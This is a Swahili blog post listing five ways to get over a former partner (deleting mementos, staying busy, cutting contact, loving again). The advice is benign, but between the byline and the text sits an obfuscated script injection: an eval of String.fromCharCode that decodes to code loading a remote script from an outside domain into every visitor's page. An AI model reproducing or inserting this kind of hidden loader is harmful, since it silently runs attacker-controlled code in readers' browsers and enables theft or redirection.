Recent Comments

Namna ya Kumsahau Mpenzi wa Zamani (EX)

By ventas malack Jan 8, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Mapenzi mara zote ni safari ndefu na ngumu pia, kuna milima na mabonde pia muda mwingine kuna mwisho japo wengi hupenda safari zao za mapenzi ziwe ni za milele, suala hili hujitokeza sana kipindi cha penzi la kwanza ambapo hapa wengi sana huumizwa sana hata kuachwa lakini bafo inakuwa ngumu kusahau hata kama mtu akipata mpenzi mwingine hali hii huweza sababisha kurejea mara kwa mara muda mwingine kuteseka na hisia juu ya mtu aliyeachana naye
Kiukweli suala la kusahau mara nyingi huwa ni gumu hasa kama ulipenda sana waswahili wanasema ukitumbukiza miguu yote miwili, hivyo bas mtu huhitji msaada wa kisaikolijia au kutumia baadhi ya mbinu za kusahau penzi hilo.
Leo nimekuletea mbinu au njia chache za kusaidia kumsahau mpenzi aliyekuacha.


1: Futa au teketeza kila kumbukumbu mlizoweka mkiwa pamoja,
Hii ni kama mtu unapendelea sana kuweka picha na jumbe za mpenzi mliyeachana pia Iwe ni nguo alizoacha mlipokuwa pamoja au vitu mbalimbali, Kumbuka kuwa kuweka mabaki ya wapenzio wa zamani kuna uwezo mkubwa wa kukurejesha mikononi mwake hata kama una mpenzi au umeolewa kwa sasa, sasa ili kuepuka hili choma vitu hivyo au uvitupilie mbali kabisa ili kuondosha hisia juu ya mtu huyo.
2: Jishughulishe kila mara,
Unapokuwa na wakat mgumu kama huu usikae pekee yako kwa muda mrefu kwa sababu kufanya hivi kunarejesha mawazo ya zamani. Usisahau kwamba uliwahi kuishi bila yeye kwa hivyo hautaangamia ukisalia ulivyokuwa, hivyo unavojipa muda inapunguza mawazo juu ya mtu huyo. Kumbuka kuachana naye si mwisho wa maisha yako.
3: Jibunie kumbukumbu na mawazo mapya,
Ili kumsahau mpenzio wa zamani itabidi ubuni mawazo mapya.Hii inamaanisha kutozuru maeneo mliyotembelea pamoja au kula chakula kinachokukumbusha kabisa kumhusu.Jaribu jambo jipya.Fanya kitu ambacho hujawahi kufikiria kufanya, utaweza kumsahau mpenzio na kutambua mambo mengi mapya unayoweza kufanya ambayo hukuyafikiria.


4. Epuka kuwasiliana kama zamani
Ukiwa katika hali hii jitahidi kupunguza au kuondosha mawasiliano na mtu huyo mloachana hapa unaweza kubadilisha nambari yako ya rununu au kufunga zao.Futa nambari zao kutoka orodha yako na iwapo unaijua kwa kicha jaribu uwezavyo kutowasiliana naye,Jaribu kukumbuka nambari nyinginezo muhimu.Jishughulishe na mengine ili usiwe hata na muda wa kufikiria kuwasiliana naye.Baada ya muda utashangaa hukumbuki tena nambari hiyo.
5. Penda tena
Hii ndiyo hatua mwafaka zaidi ya kumsahau mpenzio wa zamani.Watafiti wamesema kwamba uwezo wa kuwapenda wapenzi wengineo aghalabu hutumiwa kuwatibu watu waliovunjwa moyo sana.Iwapo huna bahati ya kumpata mtu huyo mahsusi kumbuka kuna njia nyingi za kupata mpenzi mwingine. Kwa kufanya unachopenda zaidi, kufuga mnyama umpendaye au kwenda katika safari ambayo hutoisahau.

Kiukweli Mapenzi huendesha maisha yetu na kutupelekea kuumia, kukata tamaa hivyo basi ili kulinda maisha,furaha, amani na utu wetu tunahitajika kujua kuwa maisha mengine yanaendelea hivyo kuyasahau ya nyuma ni muhimu ili kulinda utu wetu.
@Ventas Malack

By ventas malack

Make the World Aware